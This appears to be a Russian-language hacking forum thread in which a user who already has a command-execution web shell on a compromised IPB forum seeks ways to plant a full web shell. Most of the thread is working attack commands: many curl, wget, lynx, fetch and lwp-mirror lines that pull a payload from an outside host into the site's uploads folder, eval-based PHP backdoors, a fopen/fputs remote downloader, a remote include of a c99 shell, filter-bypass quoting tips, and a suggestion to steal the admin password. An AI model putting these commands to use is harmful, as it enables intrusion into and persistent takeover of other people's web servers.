загрузка шелла на зеноне

у меня на форуме есть примитивный шелл вида
"<? system(\$cmd); ?>"
требуется залить файл полноценного шелла в папку uploads
перепробовал все известные загрузчики

curl wget get links lynx fetch GET lwp-mirror

Code:

http://***********/forum/cache/lang_cache/ru/1.php?cmd=curl --output /***********/www/forum/uploads/2.php http://files.adamant.ua/3824
http://***********/forum/cache/lang_cache/ru/1.php?cmd=wget -o /***********/www/forum/uploads/2.php http://files.adamant.ua/3824
http://***********/forum/cache/lang_cache/ru/1.php?cmd=get http://files.adamant.ua/3824 > /***********/www/forum/uploads/2.php
http://***********/forum/cache/lang_cache/ru/1.php?cmd=links -source "http://files.adamant.ua/3824" > /***********/www/forum/uploads/2.php
http://***********/forum/cache/lang_cache/ru/1.php?cmd=lynx -source http://files.adamant.ua/3824 > /***********/www/forum/uploads/2.php
http://***********/forum/cache/lang_cache/ru/1.php?cmd=fetch -o /***********/www/forum/uploads/2.php -p http://files.adamant.ua/3824
http://***********/forum/cache/lang_cache/ru/1.php?cmd=wget -o /***********/www/forum/uploads/2.php http://files.adamant.ua/3824
http://***********/forum/cache/lang_cache/ru/1.php?cmd=curl -o /***********/www/forum/uploads/2.php http://files.adamant.ua/3824
http://***********/forum/cache/lang_cache/ru/1.php?cmd=fetch -o /***********/www/forum/uploads/2.php http://files.adamant.ua/3824
http://***********/forum/cache/lang_cache/ru/1.php?cmd=lynx -source "http://files.adamant.ua/3824" > /***********/www/forum/uploads/2.php
http://***********/forum/cache/lang_cache/ru/1.php?cmd=links  -source "http://files.adamant.ua/3824" > /***********/www/forum/uploads/2.php
http://***********/forum/cache/lang_cache/ru/1.php?cmd=GET http://files.adamant.ua/3824 > /***********/www/forum/uploads/2.php
http://***********/forum/cache/lang_cache/ru/1.php?cmd=lwp-mirror http://files.adamant.ua/3824 /***********/www/forum/uploads/2.php

ни один не сработал
хотя шелл cmd работает
файл 1.txt создается
_http://***********/forum/cache/lang_cache/ru/1.php?cmd=echo текст > /***********/www/forum/uploads/1.txt
может еще есть какие методы загрузки
форум ipb 2.1.4 и находится находиться на хостинге зенон

 

Ты посмотри может там воще качалок нету. Или права на запись отсуствуют. Как писал уже качалки смотреть пример:which wget. И так и другие проверяешь.

 

создай файл abc.php
Затем впиши echo '<?php eval($_GET[cmd]);?>' в файл abc.php
то потом просто пиши
abc.php?cmd=$f=fopen($_GET[r],$_GET[rr]);$o=fopen($_GET[o],$_GET[oo]);while(!feof($f)){$row=fgets($f);fputs($o,$row);}&rr=r&oo=w+&r=http://www.yoursite.com/shell.txt&o=shell.php

 

не могу создать файл abc.php
с содержимым '<?php eval($_GET[cmd]);?>'
с простым текстом создается _http://*******/forum/cache/lang_cache/ru/1.php?cmd=echo текст > /*******/forum/uploads/abc.php
_http://*******/forum/cache/lang_cache/ru/1.php?cmd=echo '<?php eval($_GET[cmd]);?>' > /*******/forum/uploads/abc.php не проходит
вероятно не нравятся спец символы в '<?php eval($_GET[cmd]);?>'

 

Зачем столько трудностей?
Содержание файла должно быть просто

PHP:

<?
eval($_GET['cmd']);
?>

И вообще можно просто инклудить веб-шелл, например

PHP:

<?
include('http://dermoshell.narod.ru/c99madshell.php');
?>

 

проблема в том что не получается вобще создать
файл с спец символами через строку браузера
например
http://**********/forum/cache/lang_cache/ru/1.php?cmd=echo текст > /**********/forum/uploads/2.php
все нормально на сервере создается файл 2.php с содержимым текст

http://**********/forum/cache/lang_cache/ru/1.php?cmd=echo <? eval($_GET['cmd']); ?> > /**********/forum/uploads/2.php
создается пустой файл 2.php код <? eval($_GET['cmd']); ?> не проходит

 

не проходят символы >< () причем перевод их в hex %3E%3C%28%29
не помогает как ето можно обойти

 

Code:

echo '<?php eval($_GET[\'cmd\']) ?>' > куда.php

обрати внимание на кавычки

 

Ммм а пасс админа если сныкать и залить из админки шелл в папку со смайлами?